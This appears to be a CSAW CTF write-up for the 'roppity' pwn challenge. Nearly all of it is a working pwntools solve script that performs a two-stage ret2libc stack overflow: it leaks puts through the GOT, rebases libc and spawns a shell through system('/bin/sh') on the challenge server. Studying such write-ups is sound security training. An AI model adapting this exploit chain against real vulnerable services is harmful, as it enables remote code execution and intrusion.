CSAWCTF — PWN — ROPPITY

"A" * 40 + MAIN_ADDR
send("A" * 40 + MAIN_ADDR)
send("A" * 40 + PLT_PUTS + GOT_PUTS + MAIN_ADDR)
send("A" * 40 + LIBC_SYSTEM + LIBC["/bin/sh"])
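#!/usr/bin/env python
# CSAW CTF "roppity" solve script: a two-stage ret2libc over a stack
# overflow whose saved return address sits 40 bytes into the buffer
# (hence every payload is `fit({40: ...})`).
#
#   stage 1 - return into puts@plt with puts@got as the argument, so the
#             binary prints the runtime address of puts(), then return
#             into main() so the overflow can be triggered again;
#   stage 2 - rebase the libc ELF on that leak and return into
#             system("/bin/sh").
#
# Written for Python 2 (the page runs it as `python2 exploit.py`).
from pwn import *
import struct

b = ELF("./rop")
context(os="linux", arch="amd64")
libc = ELF("./libc-2.27.so")
r = remote("pwn.chal.csaw.io", 5016)

# Consume the banner, then overwrite the return address with main() so
# the program re-enters main and prompts once more.
print(r.recv())
r.sendline(fit({40: b.sym.main}))
print(r.recv())

# Stage 1: puts(puts@got) leaks the resolved address, then back to main().
rop = ROP(b)
rop.call(b.sym.puts, [b.got.puts])
rop.call(b.sym.main)
r.sendline(fit({40: rop.chain()}))

# puts() emits the pointer as raw bytes and stops at the first NUL byte, so
# the line is shorter than 8 bytes; pad it back before unpacking as u64.
leaked = r.recvline(False)
puts = u64(leaked.ljust(8, "\x00"))
log.info("Puts is at %#x", puts)

# The leak minus puts' offset inside libc-2.27.so is the libc load base
# (the original script called this __libc_start_main, which it is not).
libc_base = puts - libc.sym['puts']
libc.address = libc_base
log.info("libc base address: %#x", libc.address)

# Stage 2: with libc rebased, libc.sym / libc.search now yield runtime
# addresses, so the chain calls system() on the in-libc "/bin/sh" string.
rop = ROP(b)
system = libc.sym.system
binsh = next(libc.search("/bin/sh"))
rop.call(system, [binsh])
r.sendline(fit({40: rop.chain()}))

r.interactive()
r.close()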
python2 exploit.py

--

--

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL
